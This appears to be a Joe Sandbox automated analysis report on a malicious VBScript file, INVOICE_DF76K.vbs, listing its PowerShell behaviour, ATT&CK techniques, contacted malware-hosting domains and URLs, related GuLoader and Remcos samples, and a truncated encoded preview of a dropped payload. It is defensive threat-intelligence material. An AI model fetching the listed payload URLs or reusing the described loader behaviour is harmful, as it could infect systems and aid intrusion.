              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information221
              Scripting              		Valid Accounts11
              Windows Management Instrumentation              		221
              Scripting              		11
              Process Injection              		1
              Masquerading              		OS Credential Dumping1
              Security Software Discovery              		Remote Services1
              Archive Collected Data              		11
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts21
              Command and Scripting Interpreter              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		21
              Virtualization/Sandbox Evasion              		LSASS Memory1
              Process Discovery              		Remote Desktop ProtocolData from Removable Media1
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Exploitation for Client Execution              		Logon Script (Windows)Logon Script (Windows)11
              Process Injection              		Security Account Manager21
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive2
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts2
              PowerShell              		Login HookLogin Hook1
              Deobfuscate/Decode Files or Information              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput Capture13
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
              Obfuscated Files or Information              		LSA Secrets1
              File and Directory Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Software Packing              		Cached Domain Credentials13
              System Information Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              DLL Side-Loading              		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              INVOICE_DF76K.vbs5%VirustotalBrowse

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://nuget.org/NuGet.exe0%URL Reputationsafe
              http://nuget.org/NuGet.exe0%URL Reputationsafe
              http://crl.m0%URL Reputationsafe
              http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
              https://aka.ms/pscore6lB0%URL Reputationsafe
              http://crl.microsoft0%URL Reputationsafe
              https://go.micro0%URL Reputationsafe
              https://contoso.com/0%URL Reputationsafe
              https://nuget.org/nuget.exe0%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              https://aka.ms/pscore680%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
              https://adjuntia.ru.com/wp-includes/img/Appliances.smi0%Avira URL Cloudsafe
              https://ambyverce.com/Appliances.smi0%Avira URL Cloudsafe
              http://www.apache.org/licenses/LICENSE-2.0.html0%Avira URL Cloudsafe
              https://adjuntia.ru.com0%Avira URL Cloudsafe
              http://adjuntia.ru.com0%Avira URL Cloudsafe
              https://github.com/Pester/Pester0%Avira URL Cloudsafe
              https://ambyverce.com/Appliances.smid0%Avira URL Cloudsafe
              http://www.apache.org/licenses/LICENSE-2.0.html0%VirustotalBrowse
              https://github.com/Pester/Pester1%VirustotalBrowse

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              adjuntia.ru.com
              		185.221.216.115
              		truefalse
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                https://adjuntia.ru.com/wp-includes/img/Appliances.smifalse
                • Avira URL Cloud: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                https://ambyverce.com/Appliances.smipowershell.exe, 00000003.00000002.3317936149.00000266C0A68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.3317936149.00000266BF3C8000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.3408756335.00000266CF20D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3322827054.0000000005E85000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://crl.mpowershell.exe, 00000003.00000002.3438249100.00000266D77E0000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000007.00000002.3317433390.0000000004F78000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://aka.ms/pscore6lBpowershell.exe, 00000007.00000002.3317433390.0000000004E21000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://crl.microsoftpowershell.exe, 00000007.00000002.3329236621.0000000007A0E000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000007.00000002.3317433390.0000000004F78000.00000004.00000800.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://go.micropowershell.exe, 00000003.00000002.3317936149.00000266C0605000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://contoso.com/powershell.exe, 00000007.00000002.3322827054.0000000005E85000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.3408756335.00000266CF20D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3322827054.0000000005E85000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://contoso.com/Licensepowershell.exe, 00000007.00000002.3322827054.0000000005E85000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                https://contoso.com/Iconpowershell.exe, 00000007.00000002.3322827054.0000000005E85000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://aka.ms/pscore68powershell.exe, 00000003.00000002.3317936149.00000266BF1A1000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://adjuntia.ru.compowershell.exe, 00000003.00000002.3317936149.00000266BF5E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.3317936149.00000266C0C44000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.3317936149.00000266BF1A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3317433390.0000000004E21000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://adjuntia.ru.compowershell.exe, 00000003.00000002.3317936149.00000266C0F9F000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://github.com/Pester/Pesterpowershell.exe, 00000007.00000002.3317433390.0000000004F78000.00000004.00000800.00020000.00000000.sdmpfalse
                • 1%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://ambyverce.com/Appliances.smidpowershell.exe, 00000007.00000002.3317433390.0000000004F78000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                185.221.216.115
                		adjuntia.ru.comUnited Kingdom
                		393960HOST4GEEKS-LLCUSfalse

                General Information

                Joe Sandbox version:40.0.0 Tourmaline
                Analysis ID:1500268
                Start date and time:2024-08-28 06:53:08 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 5m 54s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:10
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:INVOICE_DF76K.vbs
                Detection:MAL
                Classification:mal100.troj.expl.evad.winVBS@11/8@1/1
                EGA Information:Failed
                HCA Information:
                • Successful, ratio: 96%
                • Number of executed functions: 52
                • Number of non-executed functions: 25
                Cookbook Comments:
                • Found application associated with file extension: .vbs

                Warnings

                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                • Excluded IPs from analysis (whitelisted): 93.184.221.240
                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com
                • Execution Graph export aborted for target powershell.exe, PID 1600 because it is empty
                • Execution Graph export aborted for target powershell.exe, PID 5572 because it is empty
                • Not all processes where analyzed, report is missing behavior information
                • Report size getting too big, too many NtCreateKey calls found.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                Simulations

                Behavior and APIs

                TimeTypeDescription
                00:53:58API Interceptor1x Sleep call for process: wscript.exe modified
                00:54:10API Interceptor132x Sleep call for process: powershell.exe modified

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                185.221.216.115Liste d'inventaire.exeGet hashmaliciousFormBook, GuLoaderBrowse
                • plyagoogle.sa.com/oLmPN132.bin
                Production_list.exeGet hashmaliciousGuLoaderBrowse
                • thefifthsuncd.sa.com/CgCLdYfbALQqzwZgzwoGcWFCag107.bin
                Inventory_list.exeGet hashmaliciousGuLoaderBrowse
                • simbajonesaberdovey.sa.com/nxieuH252.bin
                doc12917820200318081747_pdf_991KB.vbsGet hashmaliciousGuLoader, RemcosBrowse
                • gamonosa.sa.com/.well-known/kr/UvcZuvTnzIO46.bin
                doc12917820200318081747_pdf_(991KB).vbsGet hashmaliciousGuLoader, RemcosBrowse
                • gamonosa.sa.com/.well-known/kr/UvcZuvTnzIO46.bin
                Protected Client.vbsGet hashmaliciousRemcosBrowse
                • instment.ga/note/Encrypted%20Client%20OG.jpg
                ach remit.xlsGet hashmaliciousUnknownBrowse
                • instment.ga/note/Protected%20Client.vbs
                ach remit.xlsGet hashmaliciousUnknownBrowse
                • instment.ga/note/Encrypted%20Client%20OG.jpg
                ach remit.xlsGet hashmaliciousUnknownBrowse
                • instment.ga/note/Encrypted%20Client%20OG.jpg

                Domains

                No context

                ASNs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                HOST4GEEKS-LLCUShttp://battlegrounds-bgmi-reward.events-games.com/Get hashmaliciousUnknownBrowse
                • 185.221.219.64
                PO 001.vbsGet hashmaliciousGuLoaderBrowse
                • 185.221.216.115
                https://dineromillenia.pages.devGet hashmaliciousHTMLPhisherBrowse
                • 185.221.219.64
                RFQ-7H87-F8R-pdf.exeGet hashmaliciousRemcos, GuLoaderBrowse
                • 185.221.216.247
                https://dineromillenia.pages.dev/Get hashmaliciousHTMLPhisher, Tycoon2FABrowse
                • 185.221.219.64
                https://click.pstmrk.it/3s/link.sbstck.com%2Fredirect%2Ffdc039b6-14b1-43e9-8235-12dc248cdb78%3Fj%3DeyJ1IjoiNDltdXZ6In0.CxolcWPhPGrBgw3rA0jd5lscc71sjQLfIOZNSPA48EY%3D/YI-Q/fDO3AQ/AQ/17a69137-bb89-4a93-9d8b-1ad30fe8f190/1/pUhVRIX1zrGet hashmaliciousHTMLPhisherBrowse
                • 185.221.216.115
                DHL Package.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                • 172.93.120.113
                Setup.exeGet hashmaliciousAsyncRAT, HTMLPhisher, Clipboard Hijacker, Phorpiex, PureLog Stealer, Raccoon Stealer v2, RedLineBrowse
                • 172.93.120.134
                ZYRWFLfnV1.exeGet hashmaliciousGuLoaderBrowse
                • 172.93.120.134
                PinnacesMax.exeGet hashmaliciousFormBook, GuLoaderBrowse
                • 172.93.120.134

                JA3 Fingerprints

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                3b5074b1b5d032e5620f69f9f700ff0eQuotation.exeGet hashmaliciousAgentTeslaBrowse
                • 185.221.216.115
                ibero.batGet hashmaliciousSilverRatBrowse
                • 185.221.216.115
                Invoice0.exeGet hashmaliciousSilverRatBrowse
                • 185.221.216.115
                ZKB - Zahlungsbest#U00e4tigung an 20240828.pdf.exeGet hashmaliciousQuasarBrowse
                • 185.221.216.115
                IrisLily673Xander.msc.exeGet hashmaliciousUnknownBrowse
                • 185.221.216.115
                http://pub-10050726d25949d8bd6cb438a8b6b09c.r2.dev/home.htmlGet hashmaliciousUnknownBrowse
                • 185.221.216.115
                http://get-verified-free-badge.vercel.app/Get hashmaliciousUnknownBrowse
                • 185.221.216.115
                https://office.microsoftoniline.com/common/oauth2/v2.0/authorize/?clinet_id=2e5d6a57-eb8c-44bf3-8bd3-fc61824af882Get hashmaliciousUnknownBrowse
                • 185.221.216.115
                http://pub-85c8ac492a5e41d7b0fad25337aa69f6.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
                • 185.221.216.115
                https://appeal-right.netlify.app/Get hashmaliciousUnknownBrowse
                • 185.221.216.115

                Dropped Files

                No context

                Created / dropped Files

                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                Download File
                Process:C:\Windows\System32\wscript.exe
                File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                Category:dropped
                Size (bytes):71954
                Entropy (8bit):7.996617769952133
                Encrypted:true
                SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                Malicious:false
                Reputation:high, very likely benign file
                Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                Download File
                Process:C:\Windows\System32\wscript.exe
                File Type:data
                Category:dropped
                Size (bytes):328
                Entropy (8bit):3.144086598890895
                Encrypted:false
                SSDEEP:6:kK3R9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:fADnLNkPlE99SNxAhUe/3
                MD5:E697A7B528579C663428404F3AD83FE4
                SHA1:882F9BB4B1EDA55E6BB6DD2517261808E9829CBA
                SHA-256:CAD12ED92A0185F56EC0F2407EC4E4E7375B7DB29DABBB8C170E1FB992951E73
                SHA-512:A380250C7FA892B93C0C1127DDEAAF9A36906EED2148DB888F52198ED3692D6321F373B9C8229442D6DEFEAB311E84B99348A48B1E1A270BC46FCCD1DAB1A96C
                Malicious:false
                Reputation:low
                Preview:p...... ........[.SK....(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                Download File
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:modified
                Size (bytes):11608
                Entropy (8bit):4.8908305915084105
                Encrypted:false
                SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9R:9rib4Z1VoGIpN6KQkj2qkjh4iUxsT6YP
                MD5:DD89E182EEC1B964E2EEFE5F8889DCD7
                SHA1:326A3754A1334C32056811411E0C5C96F8BFBBEE
                SHA-256:383ABA2B62EA69A1AA28F0522BCFB0A19F82B15FCC047105B952950FF8B52C63
                SHA-512:B9AFE64D8558860B0CB8BC0FA676008E74F983C4845895E5444DD776A42B584ECE0BB1612D8F97EE631B064F08CF5B2C7622D58A3EF8EF89D199F2ACAEFA8B52
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0o4oced3.sxo.psm1

                Download File
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Preview:# PowerShell test file to determine AppLocker lockdown mode

                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0qufbxqu.w2q.psm1

                Download File
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Preview:# PowerShell test file to determine AppLocker lockdown mode

                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eqo2ziok.hts.ps1

                Download File
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Preview:# PowerShell test file to determine AppLocker lockdown mode

                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qhxffuwj.1as.ps1

                Download File
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Preview:# PowerShell test file to determine AppLocker lockdown mode

                C:\Users\user\AppData\Roaming\Spisefisk.Pur

                Download File
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with very long lines (65536), with no line terminators
                Category:dropped
                Size (bytes):464620
                Entropy (8bit):5.975508506784015
                Encrypted:false
                SSDEEP:12288:YsOXOjSaM9ILRXA3uF4/ooebQHGBrYhHqXlqxG4/8:YxXtb9ILRXp4V3mdYhAl+s
                MD5:62E0420B9A9C55E3EB4584150A0ECD9B
                SHA1:662813124A4BA0AFAA06BE627AC8034E9E8C3F2D
                SHA-256:EE5C24B25D6BE0B41524F72D3B772E628DE8763BEEB931A980F4A2AE4C0CE1DF
                SHA-512:8C752C111AF4B7355E9503BB7E9B7DEB6ADB9CF360B2F34421EBC4DF7A62BA54BBE04C4F880C11767095181CAAA81D277AA0C8DAC54E19B7C6FAAC74EB3204CF
                Malicious:false
                Preview:cQGbcQGbu6POGQDrApcGcQGbA1wkBOsCTNRxAZu5aU0CyOsCodJxAZuB8eLWP6BxAZtxAZuBwXVkwpdxAZvrAn7T6wKMP+sC6066HiN1sXEBm+sCzt1xAZtxAZsxynEBm+sC6HOJFAtxAZtxAZvR4nEBm3EBm4PBBOsCUYfrAiMZgfkd9L4DfM3rAtczcQGbi0QkBHEBm+sCtKCJw3EBm3EBm4HDKZloA+sCSuPrAsIIusPrqtNxAZvrAokXgfKMXNjqcQGb6wJHCIHqT7dyOesCehpxAZvrAvqq6wK+desCBdrrAm2IiwwQ6wKbQnEBm4kME3EBm+sCuD5C6wKOJHEBm4H6SOIEAHXUcQGbcQGbiVwkDHEBm3EBm4HtAAMAAOsCVlFxAZuLVCQIcQGb6wI4NYt8JARxAZvrAm+oievrAty9cQGbgcOcAAAA6wJeo3EBm1NxAZvrAnJHakDrAiVUcQGbievrAieTcQGbx4MAAQAAANDbA3EBm3EBm4HDAAEAAHEBm+sC6l1T6wLLZnEBm4nrcQGbcQGbibsEAQAA6wLFk+sCYhKBwwQBAABxAZvrAj/2U+sCNmjrApo6av9xAZvrAnB/g8IF6wIgjnEBmzH26wLsn+sC734xyXEBm3EBm4sa6wJnb3EBm0HrAjmfcQGbORwKdfPrAlNbcQGbRusC4ejrAgDPgHwK+7h13OsCgNpxAZuLRAr86wKTSXEBmynw6wJiLHEBm//ScQGb6wImpLpI4gQA6wJfc3EBmzHAcQGb6wLrwIt8JAzrAhu/6wKnGIE0Bz/X6VPrAievcQGbg8AEcQGb6wLIyjnQdeRxAZtxAZuJ+3EBm3EBm//X6wIO1OsCOsS2Mi7WNygWrBrhuqq+YuGswCjCstt6aOY3KBaspzYXAL5i4azAKH9mdtClrLLfFqzAoh7X7oLRkLYyUFTIGvDXwVYYPrgytwSAjhsWfFYW6z/X6Vy7MydXP4hooknZLey+LqbQ

                Static File Info

                General

                File type:ASCII text, with CRLF line terminators
                Entropy (8bit):5.042968723535752
                TrID:
                  File name:INVOICE_DF76K.vbs
                  File size:51'026 bytes
                  MD5:af84a827601b117c89f0fe2a30604669
                  SHA1:6844a66c86b23a67429aee33094ba33bc9c61fe6
                  SHA256:48c37299c9515e8cf91ff1faa09135014ae7303a88aea29e1d2298398200617f
                  SHA512:08ed82ae956a5e05e54da7699471808b18bc3c741bf401e12421a0be51a72a38fc250f2c47732159dd7ddd8c770203707ee74fc65fe8ad173d6da77853a38c70
                  SSDEEP:384:3TZMJWa0ExTcydcXtfKUg9EHfHAWcaaySJTFpuIDoGWKj0vfyFkMAqfhCDnXSP3D:Daj0ExAVg9KTwRubhwkAL
                  TLSH:00337CC27ACD1B13218CFDFEE646CDA958F34C652A0D95B5365CACE700322BC751A1B9
